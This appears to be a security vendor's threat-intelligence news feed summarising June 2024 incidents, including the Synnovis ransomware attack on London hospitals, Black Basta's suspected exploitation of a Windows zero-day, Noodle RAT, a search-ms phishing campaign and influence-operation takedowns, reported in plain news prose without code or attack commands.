    NHS England disclosed that multiple London hospitals affected by the Synnovis ransomware attack were compelled to cancel hundreds of planned operations and appointments. Synnovis, formerly known as Viapath, was established as a partnership among SYNLAB UK & Ireland, Guy's and St Thomas' NHS Foundation Trust, and King's College Hospital NHS Foundation Trust. The June 3 attack by the Qilin ransomware group led to significant service disruptions at these trusts and primary care providers in South East London, affecting procedures reliant on pathology services, such as blood transfusions and testing. While emergency services remained operational, the NHS reported over 800 planned operations and 700 outpatient appointments needed to be rescheduled. The recovery process is expected to take months. Additionally, NHS Blood and Transplant warned about a blood shortage in London hospitals, specifically requesting O-positive and O-negative blood donors to replenish reserves critical for urgent procedures. The attack's impact on operations and patient care prompted hospital executives to apologize and urge patients to attend their appointments unless notified otherwise.

  • Jun 13, 2024

    • Cve-2024-26169
    • Blackbasta
    • CVE-2024-26169
    • Darkgate

    Black Basta ransomware gang linked to Windows zero-day attacks

    The Black Basta ransomware operation is suspected of exploiting a Windows privilege escalation vulnerability (CVE-2024-26169) as a zero-day before a fix was made available. This high-severity flaw (CVSS v3.1: 7.8) in the Windows Error Reporting Service allows attackers to elevate their privileges to SYSTEM. Microsoft addressed the issue in its March 12, 2024 Patch Tuesday updates, although the vendor's page shows no evidence of active exploitation. However, Symantec's report indicates that the Cardinal cybercrime group (Storm-1811, UNC4394), operators of the Black Basta gang, likely leveraged this vulnerability as a zero-day. Symantec's investigation revealed that an exploit tool for CVE-2024-26169 was used in an attempted ransomware attack following an initial infection by the DarkGate loader, which Black Basta has utilized since the QakBot takedown. The attackers, linked to Black Basta, used batch scripts disguised as software updates to run malicious commands and maintain persistence. The exploit tool takes advantage of the Windows file werkernel.sys using a null security descriptor when creating registry keys, allowing the creation of a registry key that launches a shell with SYSTEM privileges. Notably, one variant of the exploit tool has a compilation timestamp from February 27, 2024, and another from December 18, 2023, suggesting Black Basta had a working exploit well before Microsoft fixed the flaw. Despite the possibility of modified timestamps, the attackers likely did not falsify these dates. Black Basta, linked to the defunct Conti syndicate, has a record of expertise in exploiting Windows tools.

  • Jun 13, 2024

    • Calypso
    • Mustang Panda
    • Angryrebel
    • Rocke
    • Exfiltration Over C2 Channel
    • Local Account
    • Compromise Accounts

    New Malware 'Noodle RAT' Targets Windows and Linux Systems

    A newly identified cross-platform malware, named Noodle RAT, has been actively used by Chinese-speaking threat actors for espionage or cybercrime over the years. Originally categorized as a variant of Gh0st RAT and Rekoobe, Trend Micro security researcher Hara Hiroaki clarifies that Noodle RAT is a distinct new type of malware. Known by other names such as ANGRYREBEL and Nood RAT, it has versions for both Windows and Linux and has been in use since at least July 2016. The Windows variant of Noodle RAT, used by hacking groups like Iron Tiger and Calypso, functions as an in-memory modular backdoor capable of downloading/uploading files, executing additional malware, serving as a TCP proxy, and self-deleting. The Linux version has been employed by cybercrime and espionage clusters such as Rocke and Cloud Snooper, launching reverse shells, scheduling executions, and utilizing SOCKS tunneling through compromised Linux servers. Despite the differences in the backdoor commands for Windows and Linux, both versions of Noodle RAT share identical code for command-and-control (C2) communications and similar configuration formats. The malware, developed and maintained with frequent updates, appears to be commercially sold within a complex supply chain that serves both private sector firms and Chinese state-sponsored entities. Trend Micro’s analysis revealed access to a control panel and builder for the Linux variant, written in Simplified Chinese, suggesting organized distribution and use among Chinese-speaking groups. This finding aligns with earlier leaks highlighting China's extensive corporate hack-for-hire scene and its ties to state-sponsored cyber actors. The ongoing use of Noodle RAT, coupled with its misclassification and underrated threat level, underscores the persistent and evolving nature of Chinese cyber espionage efforts.

  • Jun 13, 2024

    • Phishing
    • Uri Hijacking

    Windows search protocol Phishing Campaign

    A new phishing campaign is leveraging HTML attachments to exploit the Windows search protocol (search-ms URI) to deliver malware. This technique allows attackers to force Windows Search to query file shares on remote hosts, thus opening a custom search window. Initially highlighted by Prof. Dr. Martin Johns in 2020, this functionality can be abused to share malicious files. Security researchers, including Trustwave SpiderLabs, have observed this method being used in the wild, with threat actors sending emails containing HTML attachments disguised as invoice documents. When opened, these attachments automatically open a malicious URL using the tag, or a clickable link if the refresh fails, leading to a search on a remote host for a file labeled "INVOICE." The recent attacks begin with a malicious email carrying an HTML attachment within a small ZIP archive, which helps evade security scanners. The HTML file directs the browser to a URL for the Windows Search protocol, performing a search on a remote server masked by Cloudflare. The search results display a shortcut (LNK) file named as an invoice, which triggers a batch script (BAT) when clicked. While Trustwave could not determine the exact function of the BAT due to the server being down, the potential for harmful operations is significant. To defend against this threat, Trustwave recommends deleting registry entries associated with the search-ms/search URI protocol, though this action should be taken with caution as it may impact legitimate applications relying on this protocol.

  • Jun 13, 2024

    • ransomware
    • arrest

    LockBit & Conti Ransomware Affiliate Arrested in Ukraine

    A 28-year-old Ukrainian man has been arrested for his work as a freelance developer for the Russian ransomware groups Conti and LockBit. He specialized in creating cryptors, software that hides malware from antivirus detection, and frequently worked for these groups in exchange for cryptocurrency. His cryptors were identified in successful ransomware attacks in Belgium and the Netherlands, potentially leading to a prison sentence of up to 15 years. The arrest is part of Operation Endgame, an international law enforcement effort against cybercrime, and was facilitated by Dutch officials and the National Cyber Security Center.

  • Jun 10, 2024

    • global
    • campaign
    • google

    Google Takes Down Influence Campaigns Tied to China, Indonesia, and Russia

    Google has taken significant action against coordinated influence operations, removing 1,320 YouTube channels and 1,177 Blogger blogs linked to the People's Republic of China (PRC). These channels were spreading content in Chinese and English about China and U.S. foreign affairs. Additionally, Google terminated various accounts connected to influence campaigns from Indonesia, which supported the ruling party, and dismantled a network of 378 YouTube channels managed by a Russian consulting firm that promoted pro-Russian and anti-Ukrainian narratives. Other notable takedowns included channels from Pakistan, France, Russia, and Myanmar that were involved in spreading political propaganda. These efforts are part of a broader initiative by tech companies to combat disinformation. For instance, Meta and OpenAI recently disrupted an influence campaign by the Tel Aviv-based Stoic firm, which propagated pro-Israel messages amid the Israel-Hamas conflict. Microsoft also reported on Russia's escalating disinformation campaigns targeting the 2024 Summer Olympics in France, using AI-generated content to undermine the International Olympic Committee (IOC) and promote pro-Kremlin narratives. These actions highlight the ongoing battle against disinformation and the importance of robust measures to protect the integrity of information platforms.

  • Jun 10, 2024

    • vulnerability
    • exploit
    • microsoft

    Microsoft Warns of Potential Abuse by Threat Actors

    Microsoft has warned about threat actors' potential misuse of Azure Service Tags to bypass firewall rules and gain unauthorized access to cloud resources. The concern arises from findings by cybersecurity firm Tenable, which revealed that relying solely on Azure Service Tags for firewall rules could allow an attacker from one tenant to send crafted web requests to access resources in another tenant. This vulnerability affects at least ten Azure services, including Azure DevOps and Azure Machine Learning. Microsoft emphasizes that Service Tags should not be treated as a security boundary but as a routing mechanism used in conjunction with other validation controls. They recommend that customers review their use of Service Tags and ensure additional security measures are in place to authenticate trusted network traffic. Following the disclosure, Microsoft updated its documentation to highlight that Service Tags alone are insufficient for securing traffic without considering the nature of the service and the traffic it handles.

  • Jun 10, 2024

    • microsoft
    • malware

    Malicious VSCode extensions with millions of installs discovered

    Israeli researchers have uncovered significant security flaws in the Visual Studio Code (VSCode) Marketplace, highlighting vulnerabilities through an experiment that "infected" over 100 organizations by trojanizing a popular theme. They created a fake extension mimicking the popular 'Dracula Official' theme, which included risky code designed to collect system information and send it to a remote server. This experiment revealed that even high-value targets, such as a company with a $483 billion market cap, major security firms, and a national justice court network, were susceptible to such attacks. The researchers emphasized the need for better security measures in the VSCode Marketplace. The study further identified thousands of extensions with potential security risks, including 1,283 with known malicious code, 8,161 communicating with hardcoded IP addresses, and 1,452 running unknown executables. Despite reporting these findings to Microsoft, many of these risky extensions remain available for download. The researchers plan to release a tool named 'ExtensionTotal' to help developers scan their environments for threats, underscoring the need for the security community to focus on this exposed and high-risk attack vector.

  • Jun 10, 2024

    • Technology
    • Maldoc In Pdf
    • Europe
    • Russia
    • Belarus
    • Phishing For Information
    • Eastern Europe
    • Email Accounts
    • Phishing
    • Manufacturing

    Sticky Werewolf Expands Cyber Attack Targets in Russia and Belarus

    Cybersecurity researchers have disclosed details about a threat actor known as Sticky Werewolf, linked to cyber attacks targeting entities in Russia and Belarus. These phishing attacks have expanded beyond their initial focus on government organizations to include a pharmaceutical company, a Russian microbiology research institute, and the aviation sector, according to a report by Morphisec. Previous campaigns by Sticky Werewolf involved phishing emails containing links to download malicious files from platforms like gofile.io. The latest campaign uses archive files with LNK files pointing to a payload on WebDAV servers. These attacks aim to deliver commodity RATs and information-stealing malware such as Rhadamanthys and Ozone RAT. Although there's no definitive evidence of the group's national origin, the geopolitical context suggests possible links to a pro-Ukrainian cyberespionage group or hacktivists. This development follows BI.ZONE's revelation of another threat cluster, Sapphire Werewolf, responsible for over 300 attacks on Russian sectors using Amethyst malware.

  • Jun 09, 2024

    • Venezuela
    • Latin America And The Caribbean
    • exclusive
    • Glorysec

    GlorySec Launches Malware Attack in Venezuela

    In a concerning development, the hacker group GlorySec has revealed a cyber operation targeting companies in Ciudad Guayana, Venezuela. They claim to have deployed worm-type malware via USB sticks, infiltrating the systems of over 100 companies. This represents a significant escalation in GlorySec’s activities as they expand their influence and capabilities. According to GlorySec, their malware has spread widely, enabling a complete system takeover and access to personal PCs. The group posted proof of their actions on their storage channel, including screenshots from a compromised PC named “KingBike.” GlorySec stated their intention was to test the limits of their new malware without causing major harm, while showcasing its reach and capabilities. They also declared a political motive, aiming to destabilize the regime of Venezuelan President Nicolás Maduro. GlorySec hinted at a possible future deployment of their worm in Russia, contingent on the escalation of the Russo-Ukrainian war and the direct involvement of the United States. This potential operation highlights the group's strategic focus on geopolitical conflicts and their readiness to exploit such situations to test and demonstrate their cyber warfare tools.

Ready to
experience hyper-relevance?

See Argos Edge in action!

Schedule a demo

Uncover your compromised credentials from the deep and dark web

Fill in your business email to start